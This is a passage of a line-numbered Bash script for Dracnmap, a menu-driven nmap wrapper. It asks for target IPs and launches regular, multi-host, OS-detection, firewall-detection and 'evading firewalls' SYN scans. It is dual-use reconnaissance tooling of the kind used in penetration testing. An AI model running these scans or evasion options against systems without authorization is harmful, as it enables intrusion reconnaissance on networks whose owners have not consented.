  3044. $urxvt $ip &
  3046. elif test $Dracnmap == '2'
  3047. then
  3048. echo ""
  3049. echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0
  3050. read ip1
  3051. echo ""
  3052. echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0
  3053. read ip2
  3054. echo ""
  3055. echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0
  3056. read ip3
  3057. echo ""
  3058. $urxvt $ip1 $ip2 $ip3 &
  3060. elif test $Dracnmap == '3'
  3061. then
  3062. echo -e $cyan""
  3063. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3064. read ip
  3065. $urxvt -sV -T4 -O -F --version-light 1 $ip &
  3068. elif test $Dracnmap == '4'
  3069. then
  3070. echo -e $cyan""
  3071. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3072. read ip
  3073. $urxvt nmap -sA $ip &
  3075. elif test $Dracnmap == '5'
  3076. then
  3077. echo -e $cyan""
  3078. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3079. read ip
  3080. $urxvt -sS -P0 $ip &
  3082. elif test $Dracnmap == '6'
  3083. then
  3084. pingbebeb
  3086. elif test $Dracnmap == '7'
  3087. then
  3088. WebService
  3090. elif test $Dracnmap == '8'
  3091. then
  3092. nse
  3094. elif test $Dracnmap == '9'
  3095. then
  3096. zenmapscript
  3098. elif test $Dracnmap == '10'
  3099. then
  3100. scanoutput
  3102. elif test $Dracnmap == '11'
  3103. then
  3104. credits
  3106. elif test $Dracnmap == '12'
  3107. then
  3108. clear
  3109. sleep 1
  3110. echo ""
  3111. echo -e $yellow"[*] Thank You For Using Dracnmap =)."
  3112. echo ""
  3113. echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
  3114. exit
  3116. else
  3117. echo -e " Incorrect Number"
  3118. fi
  3119. echo -n -e " Do you want exit? ( Yes / No ) :"
  3120. read back
  3121. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  3122. then
  3123. clear
  3124. exit
  3125. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  3126. then
  3127. menu
  3128. fi
  3130. }
  3132. ####################################################
  3133. # BANNER
  3134. ####################################################
  3135. clear
  3136. echo -e $red ""
  3137. echo " 80G08 "
  3138. echo " 8G#G@8 "
  3139. echo " 8##0 "
  3140. echo " 0##G8 "
  3141. echo " ####08 "
  3142. echo " 8#####8 "
  3143. echo " G#####8 "
  3144. echo " 8G#####8 "
  3145. echo " #8#########0 #######8 "
  3146. echo " 8#######0 0#88##### "
  3147. echo " 8G####8 8 8#8@@8### "
  3148. echo " 8### G8 8@G###### "
  3149. echo " 8##88 8 8######8 "
  3150. echo " G##088 80G##G080 "
  3151. echo " 88000000008880# 000 "
  3152. echo " 9 0 "
  3153. echo -e $okegreen" .___ _______ ";
  3154. echo " __| _/___________ ____ \ \ _____ _____ ______ ";
  3155. echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ ";
  3156. echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >";
  3157. echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ ";
  3158. echo " \/ \/ \/ \/ \/ \/|__| ";
  3159. echo ""
  3160. echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) "
  3161. echo -e $cyan" Version $white":" $red $Version "
  3162. echo -e $cyan" Codename $white":" $red $Codename "
  3163. echo -e $cyan" Follow me on Github $white":" $red @Screetsec "
  3164. echo -e $cyan" Dracos Linux $white":" $red "
  3165. echo -e $cyan ""
  3166. echo -e $okegreen" ========================================================= ";
  3167. echo -e $white " "
  3168. echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN "
  3169. echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS "
  3170. echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE "
  3171. echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL "
  3172. echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS "
  3173. echo -e $white" [$okegreen"06"$white]$cyan PING PING !! "
  3174. echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES"
  3175. echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED "
  3176. echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) "
  3177. echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES"
  3178. echo -e $white" [$okegreen"11"$white]$cyan CREDITS "
  3179. echo -e $white" [$okegreen"12"$white]$cyan EXIT "
  3180. echo -e " "
  3181. echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice
  3182. read Dracnmap
  3183. if test $Dracnmap == '1'
  3184. then
  3185. echo -e $cyan""
  3186. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3187. read ip
  3188. $urxvt $ip &
  3190. elif test $Dracnmap == '2'
  3191. then
  3192. echo ""
  3193. echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0
  3194. read ip1
  3195. echo ""
  3196. echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0
  3197. read ip2
  3198. echo ""
  3199. echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0
  3200. read ip3
  3201. echo ""
  3202. $urxvt $ip1 $ip2 $ip3 &
  3204. elif test $Dracnmap == '3'
  3205. then
  3206. echo -e $cyan""
  3207. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3208. read ip
  3209. $urxvt -sV -T4 -O -F --version-light 1 $ip &
  3212. elif test $Dracnmap == '4'
  3213. then
  3214. echo -e $cyan""
  3215. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3216. read ip
  3217. $urxvt nmap -sA $ip &
  3219. elif test $Dracnmap == '5'
  3220. then
  3221. echo -e $cyan""
  3222. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3223. read ip
  3224. $urxvt -sS -P0 $ip &
  3226. elif test $Dracnmap == '6'
  3227. then
  3228. pingbebeb
  3230. elif test $Dracnmap == '7'
  3231. then
  3232. WebService
  3234. elif test $Dracnmap == '8'
  3235. then
  3236. nse
  3238. elif test $Dracnmap == '9'
  3239. then
  3240. zenmapscript
  3242. elif test $Dracnmap == '10'
  3243. then
  3244. scanoutput
  3246. elif test $Dracnmap == '11'
  3247. then
  3248. credits
  3250. elif test $Dracnmap == '12'
  3251. then
  3252. clear
  3253. sleep 1
  3254. echo ""
  3255. echo -e $yellow"[*] Thank You For Using Dracnmap =)."
  3256. echo ""
  3257. echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
  3258. exit
  3260. else
  3261. echo -e " Incorrect Number"
  3262. fi
  3263. echo -n -e " Do you want exit? ( Yes / No ) :"
  3264. read back
  3265. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  3266. then
  3267. clear
  3268. exit
  3269. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  3270. then
  3271. menu
  3272. fi
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